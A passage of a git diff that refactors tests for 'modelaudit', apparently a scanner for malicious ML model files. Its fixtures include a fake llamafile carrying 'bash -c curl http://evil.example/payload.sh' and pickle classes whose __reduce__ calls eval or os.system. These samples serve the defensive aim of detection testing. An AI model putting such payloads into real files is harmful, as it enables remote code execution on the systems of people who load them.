PyTorchZipScanner().scan(str(model_path)) + + assert result.success is True + assert result.metadata.get("pickle_verdict") == "clean" + assert result.metadata["pickle_files"] == ["archive/data.pkl"] + assert not any(issue.details.get("pickle_filename") == "archive/data/0" for issue in result.issues) + + +def _assert_decorated_torchscript_stub( + tmp_path: Path, decorator_line: str, class_line: str, parameters_line: str, buffers_line: str +) -> None: + model_path = create_mock_pytorch_zip(tmp_path / "model.pt", prefix="archive") + source_path = "archive/code/__torch__/payload.py" + with zipfile.ZipFile(model_path, "a") as zip_file: + zip_file.writestr( + source_path, + "\n".join( + [ + decorator_line, + class_line, + parameters_line, + buffers_line, + " def forward(self: __torch__.Payload,", + " x: Tensor) -> Tensor:", + " return x", + "", + ] + ), + ) + zip_file.writestr( + "archive/code/__torch__/payload.py.debug_pkl", + b"\x80\x02X\x18\x00\x00\x00FORMAT_WITH_STRING_TABLEq\x00.", + ) + + result = PyTorchZipScanner().scan(str(model_path)) + + python_failures = [ + check + for check in result.checks + if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED + ] + assert any(check.details.get("file") == source_path for check in python_failures) + assert all(check.severity == IssueSeverity.WARNING for check in python_failures) + + +def _assert_inexact_torchscript_pair(tmp_path: Path, filename: str, case_source_path: str, debug_path: str) -> None: + model_path = create_mock_pytorch_zip(tmp_path / filename, prefix="archive") + source_path = case_source_path + debug_pkl = b"\x80\x02X\x18\x00\x00\x00FORMAT_WITH_STRING_TABLEq\x00." + with zipfile.ZipFile(model_path, "a") as zip_file: + zip_file.writestr( + source_path, + "\n".join( + [ + "class Payload(Module):", + " __parameters__ = []", + " __buffers__ = []", + " def forward(self: __torch__.Payload,", + " x: Tensor) -> Tensor:", + " return x", + "", + ] + ), + ) + zip_file.writestr(debug_path, debug_pkl) + + result = PyTorchZipScanner().scan(str(model_path)) + + python_failures = [ + check + for check in result.checks + if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED + ] + assert any(check.details.get("file") == source_path for check in python_failures) + assert any( + issue.location == f"{model_path}:{source_path}" and issue.severity == IssueSeverity.WARNING + for issue in result.issues + ) + + +def _assert_framed_pickle_without_pattern(tmp_path: Path, payload_source: bytes, pattern: str) -> None: + zip_path = tmp_path / "model.pt" + payload = payload_source + with zipfile.ZipFile(zip_path, "w") as zipf: + zipf.writestr("archive/version", "3") + zipf.writestr("archive/data.pkl", pickle.dumps({"weights": [1, 2, 3]})) + zipf.writestr("archive/data/payload.bin", payload) + + result = PyTorchZipScanner().scan(str(zip_path)) + + assert not any( + check.name == "JIT/Script Code Execution Detection" + and check.status == CheckStatus.FAILED + and pattern in check.message + for check in result.checks + ) + + +def _assert_torchscript_stub_warning(tmp_path: Path, parameters_line: str, buffers_line: str, return_line: str) -> None: + model_path = create_mock_pytorch_zip(tmp_path / "model.pt", prefix="archive") + source_path = "archive/code/__torch__/payload.py" + with zipfile.ZipFile(model_path, "a") as zip_file: + zip_file.writestr( + source_path, + "\n".join( + [ + "class Payload(Module):", + parameters_line, + buffers_line, + " def forward(self: __torch__.Payload,", + " x: Tensor) -> Tensor:", + return_line, + "", + ] + ), + ) + zip_file.writestr( + "archive/code/__torch__/payload.py.debug_pkl", + b"\x80\x02X\x18\x00\x00\x00FORMAT_WITH_STRING_TABLEq\x00.", + ) + + result = PyTorchZipScanner().scan(str(model_path)) + + python_failures = [ + check + for check in result.checks + if check.name == "Python Code File Detection" and check.status == CheckStatus.FAILED + ] + assert any(check.details.get("file") == source_path for check in python_failures) + assert all(check.severity == IssueSeverity.WARNING for check in python_failures) + + +def _assert_fixed_cve_metadata(tmp_path: Path, monkeypatch: pytest.MonkeyPatch, version: str, cve_id: str) -> None: + model_path = _create_pytorch_zip_with_framework_version(tmp_path / "model.pt", version) + scanner = PyTorchZipScanner() + monkeypatch.setattr(scanner, "_get_installed_pytorch_version", lambda: None) + result = scanner.scan(str(model_path)) + cve_failed = [c for c in result.checks if cve_id in c.name and c.status == CheckStatus.FAILED] + assert len(cve_failed) == 0, ( + f"PyTorch {version} should NOT trigger {cve_id}. Failed checks: {[(c.name, c.message) for c in cve_failed]}" + ) + + +def _assert_runtime_cve_version(tmp_path: Path, monkeypatch: pytest.MonkeyPatch, version: str, cve_id: str) -> None: + model_path = _create_pytorch_zip_with_framework_version(tmp_path / "model.pt", "2.10.0") + scanner = PyTorchZipScanner() + monkeypatch.setattr(scanner, "_get_installed_pytorch_version", lambda: version) + result = scanner.scan(str(model_path)) + cve_checks = [c for c in result.checks if cve_id in c.name] + failed_checks = [c for c in cve_checks if c.status == CheckStatus.FAILED] + assert len(failed_checks) > 0, ( + f"Should flag PyTorch {version} as vulnerable to {cve_id}. " + f"Checks: {[(c.name, c.status) for c in result.checks]}" + ) + assert failed_checks[0].details.get("detected_pytorch_version") == version + assert failed_checks[0].details.get("pytorch_version_source") == "local_environment" + _assert_standard_cve_details(failed_checks[0].details, cve_id, version) + + +def _unavailable_distributions(*args: object, **kwargs: object) -> Iterator[object]: + del args, kwargs + raise RuntimeError("metadata unavailable") diff --git a/tests/scanners/test_r_serialized_scanner.py b/tests/scanners/test_r_serialized_scanner.py index 65c336027..0c80055e2 100644 --- a/tests/scanners/test_r_serialized_scanner.py +++ b/tests/scanners/test_r_serialized_scanner.py @@ -13,13 +13,14 @@ from modelaudit.scanners import get_scanner_for_file from modelaudit.scanners import r_serialized_scanner as r_scanner_module from modelaudit.scanners._evidence_redaction import REDACTED_EVIDENCE_VALUE, _r_non_code_spans -from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, Check, CheckStatus, IssueSeverity, ScanResult +from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity from modelaudit.scanners.r_serialized_scanner import RSerializedScanner from modelaudit.utils.file.detection import ( detect_file_format, detect_file_format_for_skip_filter, detect_format_from_extension, ) +from tests.helpers.cache import check_by_name as _check_by_name def _write_raw_r_serialized(path: Path, body: str, *, workspace_header: bool = False) -> None: @@ -60,10 +61,6 @@ def _write_concatenated_xz_r_serialized(path: Path, bodies: list[str], *, dict_s path.write_bytes(b"".join(compressed_parts)) -def _check_by_name(result: ScanResult, name: str) -> list[Check]: - return [check for check in result.checks if check.name == name] - - def test_can_handle_raw_rds_signature(tmp_path: Path) -> None: path = tmp_path / "safe.rds" _write_raw_r_serialized(path, "model\nlm\ncoefficients") @@ -788,15 +785,7 @@ def test_scan_redacts_unterminated_raw_assignment_without_credential_false_posit 'expression\nlanguage\nbase::system("curl"); token <- r"(UNTERMINATED_RAW_SECRET', ) - result = RSerializedScanner().scan(str(path)) - - credential_checks = _check_by_name(result, "Credential-like String Detection") - assert len(credential_checks) == 1 - assert credential_checks[0].status == CheckStatus.PASSED - symbol_checks = _check_by_name(result, "Executable Symbol Context Analysis") - sample = symbol_checks[0].details["examples"][0]["sample"] - assert "UNTERMINATED_RAW_SECRET" not in sample - assert sample.endswith("token <- ") + _assert_unterminated_r_assignment(path, "UNTERMINATED_RAW_SECRET") def test_scan_recovers_after_malformed_raw_prefix(tmp_path: Path) -> None: @@ -869,15 +858,7 @@ def test_scan_redacts_unterminated_quoted_assignment_without_credential_false_po 'expression\nlanguage\nbase::system("curl"); token <- "UNTERMINATED_QUOTED_SECRET', ) - result = RSerializedScanner().scan(str(path)) - - credential_checks = _check_by_name(result, "Credential-like String Detection") - assert len(credential_checks) == 1 - assert credential_checks[0].status == CheckStatus.PASSED - symbol_checks = _check_by_name(result, "Executable Symbol Context Analysis") - sample = symbol_checks[0].details["examples"][0]["sample"] - assert "UNTERMINATED_QUOTED_SECRET" not in sample - assert sample.endswith("token <- ") + _assert_unterminated_r_assignment(path, "UNTERMINATED_QUOTED_SECRET") def test_scan_detects_long_rightward_raw_credential_identifier(tmp_path: Path) -> None: @@ -901,7 +882,7 @@ def test_scan_detects_long_rightward_raw_credential_identifier(tmp_path: Path) - def test_scan_allows_benign_r_assignment_key_near_matches(tmp_path: Path) -> None: path = tmp_path / "benign-native-assignments.rds" - _write_raw_r_serialized( + _assert_r_credential_control( path, "monkey <- 'BENIGN_VALUE'; tokenizer <- 'BENIGN_VALUE'; `not-a-tokenizer` <- 'BENIGN_VALUE'; " "`not a tokenizer` <- 'BENIGN_VALUE'; signature <- 'gaussian'; credential <- 'standard'; " @@ -912,25 +893,10 @@ def test_scan_allows_benign_r_assignment_key_near_matches(tmp_path: Path) -> Non 'config[["tokenizer"]] <- "BENIGN_VALUE"', ) - result = RSerializedScanner().scan(str(path)) - - credential_checks = _check_by_name(result, "Credential-like String Detection") - assert len(credential_checks) == 1 - assert credential_checks[0].status == CheckStatus.PASSED - def test_scan_allows_benign_json_credential_key_metadata(tmp_path: Path) -> None: path = tmp_path / "benign-json-metadata.rds" - _write_raw_r_serialized( - path, - '{"token": "standard", "client.secret": "metadata"}', - ) - - result = RSerializedScanner().scan(str(path)) - - credential_checks = _check_by_name(result, "Credential-like String Detection") - assert len(credential_checks) == 1 - assert credential_checks[0].status == CheckStatus.PASSED + _assert_r_credential_control(path, '{"token": "standard", "client.secret": "metadata"}') def test_r_named_argument_helper_stops_function_body_at_completed_statement() -> None: @@ -1196,14 +1162,7 @@ def test_scan_allows_assignment_examples_inside_benign_metadata(tmp_path: Path, ], ) def test_scan_unmatched_delimiters_do_not_hide_equal_assignments(tmp_path: Path, assignment: str) -> None: - path = tmp_path / "unmatched-delimiter-credential.rds" - _write_raw_r_serialized(path, assignment) - - result = RSerializedScanner().scan(str(path)) - - credential_checks = _check_by_name(result, "Credential-like String Detection") - assert len(credential_checks) == 1 - assert credential_checks[0].status == CheckStatus.FAILED + _assert_r_equal_assignment_detected(tmp_path, assignment, ("unmatched-delimiter-credential.rds")) @pytest.mark.parametrize( @@ -1424,14 +1383,7 @@ def test_scan_unmatched_delimiters_do_not_hide_equal_assignments(tmp_path: Path, ], ) def test_scan_grouped_equal_assignments_are_detected(tmp_path: Path, assignment: str) -> None: - path = tmp_path / "grouped-credential-assignment.rds" - _write_raw_r_serialized(path, assignment) - - result = RSerializedScanner().scan(str(path)) - - credential_checks = _check_by_name(result, "Credential-like String Detection") - assert len(credential_checks) == 1 - assert credential_checks[0].status == CheckStatus.FAILED + _assert_r_equal_assignment_detected(tmp_path, assignment, ("grouped-credential-assignment.rds")) def test_scan_batches_repeated_named_argument_validation(tmp_path: Path) -> None: @@ -1735,3 +1687,36 @@ def test_archive_routes_renamed_r_workspace_without_promoting_weak_raw_near_matc ) assert not any("notes.jpg" in (issue.location or "") for issue in result.issues) assert not any("header-notes.jpg" in (issue.location or "") for issue in result.issues) + + +def _assert_r_equal_assignment_detected(tmp_path: Path, assignment: str, filename: str) -> None: + path = tmp_path / filename + _write_raw_r_serialized(path, assignment) + + result = RSerializedScanner().scan(str(path)) + + credential_checks = _check_by_name(result, "Credential-like String Detection") + assert len(credential_checks) == 1 + assert credential_checks[0].status == CheckStatus.FAILED + + +def _assert_unterminated_r_assignment(path: Path, secret: str) -> None: + result = RSerializedScanner().scan(str(path)) + + credential_checks = _check_by_name(result, "Credential-like String Detection") + assert len(credential_checks) == 1 + assert credential_checks[0].status == CheckStatus.PASSED + symbol_checks = _check_by_name(result, "Executable Symbol Context Analysis") + sample = symbol_checks[0].details["examples"][0]["sample"] + assert secret not in sample + assert sample.endswith("token <- ") + + +def _assert_r_credential_control(path: Path, text: str) -> None: + _write_raw_r_serialized(path, text) + + result = RSerializedScanner().scan(str(path)) + + credential_checks = _check_by_name(result, "Credential-like String Detection") + assert len(credential_checks) == 1 + assert credential_checks[0].status == CheckStatus.PASSED diff --git a/tests/scanners/test_rknn_scanner.py b/tests/scanners/test_rknn_scanner.py index 5289351fe..ee7e47b67 100644 --- a/tests/scanners/test_rknn_scanner.py +++ b/tests/scanners/test_rknn_scanner.py @@ -11,12 +11,11 @@ from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity from modelaudit.scanners.rknn_scanner import RknnScanner from modelaudit.utils.file.detection import detect_file_format +from tests.helpers.file_creators import write_binary_fixture def _write_rknn_file(tmp_path: Path, payload: bytes, filename: str = "model.rknn") -> Path: - path = tmp_path / filename - path.write_bytes(payload) - return path + return write_binary_fixture(tmp_path, filename, payload) def test_can_handle_valid_rknn_file(tmp_path: Path) -> None: diff --git a/tests/scanners/test_safetensors_scanner.py b/tests/scanners/test_safetensors_scanner.py index 55ec29e04..08b7ab1a2 100644 --- a/tests/scanners/test_safetensors_scanner.py +++ b/tests/scanners/test_safetensors_scanner.py @@ -2684,45 +2684,13 @@ def test_license_metadata_percent_encoded_backslash_text_without_url_stays_clean f"{ordinary_license_text_without_url()}\n" "Documentation note: %5C is a percent-encoded backslash in Windows path prose." ) - write_raw_safetensors( - file_path, - { - "tensor": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]}, - "__metadata__": {"license": payload}, - }, - b"\x00", - ) - - result = SafeTensorsScanner().scan(str(file_path)) - - assert len(payload) < 1000 - assert "http://" not in payload - assert "https://" not in payload - assert result.success is True - assert result.metadata["custom_metadata_security_flags"] == [] - assert not [issue for issue in result.issues if issue.rule_code == "S905"] + _assert_license_backslash_text(file_path, payload) def test_license_metadata_raw_backslash_text_without_url_stays_clean(tmp_path: Path) -> None: file_path = tmp_path / "short_raw_backslash_text_license_metadata.safetensors" payload = f"{ordinary_license_text_without_url()}\nDocumentation note: C:\\models\\license is a local path example." - write_raw_safetensors( - file_path, - { - "tensor": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]}, - "__metadata__": {"license": payload}, - }, - b"\x00", - ) - - result = SafeTensorsScanner().scan(str(file_path)) - - assert len(payload) < 1000 - assert "http://" not in payload - assert "https://" not in payload - assert result.success is True - assert result.metadata["custom_metadata_security_flags"] == [] - assert not [issue for issue in result.issues if issue.rule_code == "S905"] + _assert_license_backslash_text(file_path, payload) def test_license_metadata_entity_encoded_backslash_text_without_url_stays_clean(tmp_path: Path) -> None: @@ -2732,23 +2700,7 @@ def test_license_metadata_entity_encoded_backslash_text_without_url_stays_clean( "Documentation note: \ names a backslash, &#x2f; names a slash, " "and C:\models\license is ordinary path prose." ) - write_raw_safetensors( - file_path, - { - "tensor": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]}, - "__metadata__": {"license": payload}, - }, - b"\x00", - ) - - result = SafeTensorsScanner().scan(str(file_path)) - - assert len(payload) < 1000 - assert "http://" not in payload - assert "https://" not in payload - assert result.success is True - assert result.metadata["custom_metadata_security_flags"] == [] - assert not [issue for issue in result.issues if issue.rule_code == "S905"] + _assert_license_backslash_text(file_path, payload) def test_license_metadata_trusted_url_with_unrelated_nested_entity_stays_clean(tmp_path: Path) -> None: @@ -3256,33 +3208,13 @@ def test_corrupted_header(tmp_path: Path) -> None: def test_non_object_header_is_inconclusive_not_clean(tmp_path: Path) -> None: - file_path = tmp_path / "array_header.safetensors" - write_raw_safetensors_header(file_path, b"[]") - - direct = SafeTensorsScanner().scan(str(file_path)) - - assert direct.success is False - assert direct.has_errors is False - assert direct.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert "safetensors_header_validation_failed" in direct.metadata["scan_outcome_reasons"] - assert any( - check.name == "Header Format Validation" and check.status == CheckStatus.FAILED for check in direct.checks - ) - assert not any(issue.severity == IssueSeverity.CRITICAL for issue in direct.issues) + _assert_safetensors_invalid_header(tmp_path, ("array_header.safetensors"), (b"[]"), ("Header Format Validation")) def test_invalid_utf8_header_is_inconclusive_not_scanner_crash(tmp_path: Path) -> None: - file_path = tmp_path / "invalid_utf8_header.safetensors" - write_raw_safetensors_header(file_path, b"{\xff}") - - direct = SafeTensorsScanner().scan(str(file_path)) - - assert direct.success is False - assert direct.has_errors is False - assert direct.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert "safetensors_header_validation_failed" in direct.metadata["scan_outcome_reasons"] - assert any(check.name == "SafeTensors JSON Parse" and check.status == CheckStatus.FAILED for check in direct.checks) - assert not any(issue.severity == IssueSeverity.CRITICAL for issue in direct.issues) + _assert_safetensors_invalid_header( + tmp_path, ("invalid_utf8_header.safetensors"), (b"{\xff}"), ("SafeTensors JSON Parse") + ) def test_invalid_utf8_license_metadata_is_inconclusive(tmp_path: Path) -> None: @@ -3745,22 +3677,8 @@ def test_benign_metadata_references_are_not_injection_patterns(tmp_path: Path, v ) def test_open_html_injection_flags_xss(tmp_path: Path, value: str) -> None: file_path = tmp_path / "open_script_metadata.safetensors" - write_raw_safetensors( - file_path, - { - "t": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]}, - "__metadata__": {"description": value}, - }, - b"\x00", - ) - - result = SafeTensorsScanner().scan(str(file_path)) - - assert result.success is False - assert "xss_html_injection" in result.metadata["custom_metadata_security_flags"] - assert any( - check.name == "SafeTensors XSS/HTML Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks + _assert_metadata_injection( + file_path, value, "description", "xss_html_injection", "SafeTensors XSS/HTML Injection Detection" ) @@ -3774,23 +3692,7 @@ def test_open_html_injection_flags_xss(tmp_path: Path, value: str) -> None: ) def test_executable_decoder_and_loader_calls_flag_code_injection(tmp_path: Path, value: str) -> None: file_path = tmp_path / "executable_loader_metadata.safetensors" - write_raw_safetensors( - file_path, - { - "t": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]}, - "__metadata__": {"payload": value}, - }, - b"\x00", - ) - - result = SafeTensorsScanner().scan(str(file_path)) - - assert result.success is False - assert "code_injection" in result.metadata["custom_metadata_security_flags"] - assert any( - check.name == "SafeTensors Code Injection Detection" and check.status == CheckStatus.FAILED - for check in result.checks - ) + _assert_metadata_injection(file_path, value, "payload", "code_injection", "SafeTensors Code Injection Detection") def test_literal_unicode_escape_metadata_still_flags_code_injection(tmp_path: Path) -> None: @@ -3952,3 +3854,56 @@ def test_multiple_distinct_patterns(tmp_path: Path) -> None: assert flagged_keys.issuperset(expected_keys), ( f"Expected all keys {expected_keys} to be flagged, got {flagged_keys}" ) + + +def _assert_safetensors_invalid_header(tmp_path: Path, filename: str, header: bytes, check_name: str) -> None: + file_path = tmp_path / filename + write_raw_safetensors_header(file_path, header) + + direct = SafeTensorsScanner().scan(str(file_path)) + + assert direct.success is False + assert direct.has_errors is False + assert direct.metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME + assert "safetensors_header_validation_failed" in direct.metadata["scan_outcome_reasons"] + assert any(check.name == check_name and check.status == CheckStatus.FAILED for check in direct.checks) + assert not any(issue.severity == IssueSeverity.CRITICAL for issue in direct.issues) + + +def _assert_license_backslash_text(file_path: Path, payload: str) -> None: + write_raw_safetensors( + file_path, + { + "tensor": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]}, + "__metadata__": {"license": payload}, + }, + b"\x00", + ) + + result = SafeTensorsScanner().scan(str(file_path)) + + assert len(payload) < 1000 + assert "http://" not in payload + assert "https://" not in payload + assert result.success is True + assert result.metadata["custom_metadata_security_flags"] == [] + assert not [issue for issue in result.issues if issue.rule_code == "S905"] + + +def _assert_metadata_injection( + file_path: Path, value: str, metadata_key: str, security_flag: str, check_name: str +) -> None: + write_raw_safetensors( + file_path, + { + "t": {"dtype": "U8", "shape": [1], "data_offsets": [0, 1]}, + "__metadata__": {metadata_key: value}, + }, + b"\x00", + ) + + result = SafeTensorsScanner().scan(str(file_path)) + + assert result.success is False + assert security_flag in result.metadata["custom_metadata_security_flags"] + assert any(check.name == check_name and check.status == CheckStatus.FAILED for check in result.checks) diff --git a/tests/scanners/test_scanner_registry.py b/tests/scanners/test_scanner_registry.py index ee14c7d38..1011f4049 100644 --- a/tests/scanners/test_scanner_registry.py +++ b/tests/scanners/test_scanner_registry.py @@ -544,31 +544,11 @@ def fail_zipfile_open(*_args: Any, **_kwargs: Any) -> Any: def test_get_scanner_for_file_honors_selection_before_zip_preflight(tmp_path: Path) -> None: - model_path = _write_zip_archive( - tmp_path / "selected-pickle.zip", - {"one.txt": b"one", "two.txt": b"two"}, - ) - - scanner = get_scanner_for_file( - str(model_path), - config={"scanners": ["pickle"], "max_zip_entries": 1}, - ) - - assert scanner is None + _assert_registry_skips_zip_preflight(tmp_path, ("selected-pickle.zip"), ("pickle")) def test_get_scanner_for_file_honors_numpy_route_before_plain_zip_preflight(tmp_path: Path) -> None: - model_path = _write_zip_archive( - tmp_path / "selected-numpy.zip", - {"one.txt": b"one", "two.txt": b"two"}, - ) - - scanner = get_scanner_for_file( - str(model_path), - config={"scanners": ["numpy"], "max_zip_entries": 1}, - ) - - assert scanner is None + _assert_registry_skips_zip_preflight(tmp_path, ("selected-numpy.zip"), ("numpy")) def test_get_scanner_for_file_routes_disguised_rar_by_header(tmp_path: Path) -> None: @@ -784,15 +764,7 @@ def test_get_scanner_for_path_routes_extensionless_middle_marker_llamafile(tmp_p def test_get_scanner_for_path_routes_extensionless_malicious_llamafile(tmp_path: Path) -> None: - llamafile_path = tmp_path / "llama" - llamafile_path.write_bytes( - b"\x7fELF" - + b"\x02\x01\x01\x00" - + b"\x00" * 56 - + b"llamafile runtime\nbash -c curl http://evil.example/payload.sh" - ) - - _assert_scanner_for_path(llamafile_path, "llamafile") + _assert_llamafile_suffix(tmp_path, "llama") def test_get_scanner_for_path_routes_renamed_cntk_by_content(tmp_path: Path) -> None: @@ -878,27 +850,11 @@ def raise_read_error(_path: str) -> bool: def test_get_scanner_for_path_routes_misnamed_malicious_llamafile(tmp_path: Path) -> None: - llamafile_path = tmp_path / "payload.jpg" - llamafile_path.write_bytes( - b"\x7fELF" - + b"\x02\x01\x01\x00" - + b"\x00" * 56 - + b"llamafile runtime\nbash -c curl http://evil.example/payload.sh" - ) - - _assert_scanner_for_path(llamafile_path, "llamafile") + _assert_llamafile_suffix(tmp_path, "payload.jpg") def test_get_scanner_for_path_prioritizes_llamafile_over_onnx_suffix(tmp_path: Path) -> None: - llamafile_path = tmp_path / "payload.onnx" - llamafile_path.write_bytes( - b"\x7fELF" - + b"\x02\x01\x01\x00" - + b"\x00" * 56 - + b"llamafile runtime\nbash -c curl http://evil.example/payload.sh" - ) - - _assert_scanner_for_path(llamafile_path, "llamafile") + _assert_llamafile_suffix(tmp_path, "payload.onnx") def test_get_scanner_for_path_does_not_route_extensionless_llamafile_near_match(tmp_path: Path) -> None: @@ -1128,3 +1084,29 @@ def unreadable_path(candidate: str, mode: int) -> bool: else: assert scanner_class is not None assert scanner_class.name == scanner_name + + +def _assert_registry_skips_zip_preflight(tmp_path: Path, filename: str, scanner_id: str) -> None: + model_path = _write_zip_archive( + tmp_path / filename, + {"one.txt": b"one", "two.txt": b"two"}, + ) + + scanner = get_scanner_for_file( + str(model_path), + config={"scanners": [scanner_id], "max_zip_entries": 1}, + ) + + assert scanner is None + + +def _assert_llamafile_suffix(tmp_path: Path, filename: str) -> None: + llamafile_path = tmp_path / filename + llamafile_path.write_bytes( + b"\x7fELF" + + b"\x02\x01\x01\x00" + + b"\x00" * 56 + + b"llamafile runtime\nbash -c curl http://evil.example/payload.sh" + ) + + _assert_scanner_for_path(llamafile_path, "llamafile") diff --git a/tests/scanners/test_sevenzip_scanner.py b/tests/scanners/test_sevenzip_scanner.py index d832e39b8..7d0209c21 100644 --- a/tests/scanners/test_sevenzip_scanner.py +++ b/tests/scanners/test_sevenzip_scanner.py @@ -16,7 +16,7 @@ import tarfile import tempfile import zipfile -from collections.abc import Generator +from collections.abc import Callable, Generator from pathlib import Path from typing import Any from unittest.mock import MagicMock, patch @@ -35,45 +35,49 @@ ) from modelaudit.scanners.xgboost_scanner import XGBoostScanner from modelaudit.utils.file.detection import PICKLE_ROUTING_INCONCLUSIVE_FORMAT +from tests.helpers.cache import assert_inconclusive_not_cached as _assert_inconclusive_aggregate_not_cached +from tests.helpers.file_creators import EvalPayload, SystemCommandPayload +from tests.helpers.file_creators import ( + ubjson_key as _ubjson_key, +) +from tests.helpers.file_creators import ( + ubjson_string as _ubjson_string, +) +from tests.helpers.file_creators import ( + xgboost_ubjson_counted_null_array_probe as _xgboost_ubjson_counted_null_array_probe, +) +from tests.helpers.file_creators import ( + xgboost_ubjson_noop_before_counted_root_header_probe as _xgboost_ubjson_noop_before_counted_root_header_probe, +) +from tests.helpers.file_creators import ( + xgboost_ubjson_probe as _xgboost_ubjson_probe, +) +from tests.helpers.file_creators import ( + xgboost_ubjson_uncounted_null_array_probe as _xgboost_ubjson_uncounted_null_array_probe, +) +from tests.helpers.scanners import scan_nested_critical_finding as nested_scan # Skip all tests if py7zr is not available for asset generation pytest_plugins: list[str] = [] -def _assert_inconclusive_aggregate_not_cached( - path: Path, - expected_reason: str, - cache_dir: Path, - **scan_kwargs: Any, -) -> None: - reset_cache_manager() - try: - first = scan_model_directory_or_file( - str(path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - **scan_kwargs, - ) - second = scan_model_directory_or_file( - str(path), - cache_enabled=True, - cache_dir=str(cache_dir), - min_cache_file_size=0, - **scan_kwargs, - ) +@pytest.fixture +def temp_7z_file() -> Generator[str, None, None]: + """Create a temporary file with .7z extension for testing.""" + with tempfile.NamedTemporaryFile(suffix=".7z", delete=False) as f: + temp_path = f.name + yield temp_path + if os.path.exists(temp_path): + os.unlink(temp_path) - for aggregate in (first, second): - metadata = aggregate.file_metadata[str(path)] - assert metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME - assert expected_reason in metadata["scan_outcome_reasons"] - assert not [ - issue for issue in aggregate.issues if issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} - ] - assert determine_exit_code(aggregate) == 2 - assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 - finally: - reset_cache_manager() + +def _nested_payload_extractor(payload: bytes) -> Callable[..., None]: + def fake_extract(*_args: Any, **kwargs: Any) -> None: + factory = kwargs.get("factory") + if factory is not None: + factory.create("nested_payload").write(payload) + + return fake_extract def _mock_scan_result( @@ -96,62 +100,6 @@ def _mock_scan_result( return result -def _ubjson_key(key: bytes) -> bytes: - return b"U" + bytes([len(key)]) + key - - -def _ubjson_string(value: bytes) -> bytes: - return b"SL" + len(value).to_bytes(8, byteorder="big", signed=True) + value - - -def _xgboost_ubjson_probe( - *, root_padding: int = 0, learner_padding: int = 0, learner_noop: bool = False, malicious: bool = False -) -> bytes: - root_body = b"" - if root_padding: - root_body += _ubjson_key(b"metadata") + _ubjson_string(b"x" * root_padding) - learner_body = b"" - if learner_padding: - learner_body += _ubjson_key(b"metadata") + _ubjson_string(b"x" * learner_padding) - learner_body += _ubjson_key(b"learner_model_param") + b"{}" - if malicious: - learner_body += _ubjson_key(b"malicious_code") + _ubjson_string(b"system(cpu)") - learner_value = (b"N" if learner_noop else b"") + b"{" + learner_body + b"}" - return b"{" + root_body + _ubjson_key(b"learner") + learner_value + _ubjson_key(b"version") + b"[]" + b"}" - - -def _xgboost_ubjson_counted_null_array_probe() -> bytes: - max_count = ((1 << 63) - 1).to_bytes(8, byteorder="big", signed=True) - learner = b"{" + _ubjson_key(b"learner_model_param") + b"{}" + _ubjson_key(b"payload") + b"[$Z#L" + max_count + b"}" - return b"{" + _ubjson_key(b"learner") + learner + _ubjson_key(b"version") + b"[]" + b"}" - - -def _xgboost_ubjson_uncounted_null_array_probe(item_count: int) -> bytes: - learner = ( - b"{" - + _ubjson_key(b"learner_model_param") - + b"{}" - + _ubjson_key(b"payload") - + b"[" - + (b"Z" * item_count) - + b"]}" - ) - return b"{" + _ubjson_key(b"learner") + learner + b"}" - - -def _xgboost_ubjson_noop_before_counted_root_header_probe() -> bytes: - return ( - b"{N#U\x02" - + _ubjson_key(b"learner") - + b"{" - + _ubjson_key(b"learner_model_param") - + b"{}" - + b"}" - + _ubjson_key(b"version") - + b"[]" - ) - - def _xgboost_ubjson_deep_before_counted_null_array_probe() -> bytes: max_count = ((1 << 63) - 1).to_bytes(8, byteorder="big", signed=True) nested = b"[" * 66 + b"Z" + b"]" * 66 @@ -193,15 +141,6 @@ def scanner(self): """Create a SevenZipScanner instance for testing""" return SevenZipScanner() - @pytest.fixture - def temp_7z_file(self): - """Create a temporary file with .7z extension for testing""" - with tempfile.NamedTemporaryFile(suffix=".7z", delete=False) as f: - temp_path = f.name - yield temp_path - if os.path.exists(temp_path): - os.unlink(temp_path) - def test_scanner_metadata(self, scanner): """Test basic scanner metadata and properties""" assert scanner.name == "sevenzip" @@ -357,12 +296,8 @@ def test_scan_malicious_archive(self, scanner: SevenZipScanner, temp_7z_file: st import py7zr # type: ignore[import-untyped] # Create malicious pickle that would execute code if unpickled - class MaliciousClass: - def __reduce__(self): - return (eval, ("print('malicious code executed')",)) - with tempfile.NamedTemporaryFile(suffix=".pkl", delete=False) as temp_pickle: - pickle.dump(MaliciousClass(), temp_pickle) + pickle.dump(EvalPayload(("print('malicious code executed')",)), temp_pickle) temp_pickle_path = temp_pickle.name try: @@ -436,15 +371,9 @@ def test_scan_extensionless_nested_7z_archive( """Extensionless nested 7z archives should recurse based on file content.""" import py7zr # type: ignore[import-untyped] - class MaliciousClass: - def __reduce__(self): - import os as os_module - - return (os_module.system, ("echo extensionless_7z_nested",)) - inner_7z_path = Path(temp_7z_file).with_name("extensionless_inner.7z") with tempfile.NamedTemporaryFile(suffix=".pkl", delete=False) as temp_pickle: - pickle.dump(MaliciousClass(), temp_pickle) + pickle.dump(SystemCommandPayload("echo extensionless_7z_nested"), temp_pickle) temp_pickle_path = temp_pickle.name try: @@ -485,48 +414,15 @@ def test_scan_misnamed_nested_7z_archive( tmp_path: Path, ) -> None: """Nested 7z archives should recurse even when the member has a misleading extension.""" - import py7zr # type: ignore[import-untyped] - - class MaliciousClass: - def __reduce__(self): - import os as os_module - - return (os_module.system, ("echo disguised_7z_nested",)) - - inner_7z_path = tmp_path / 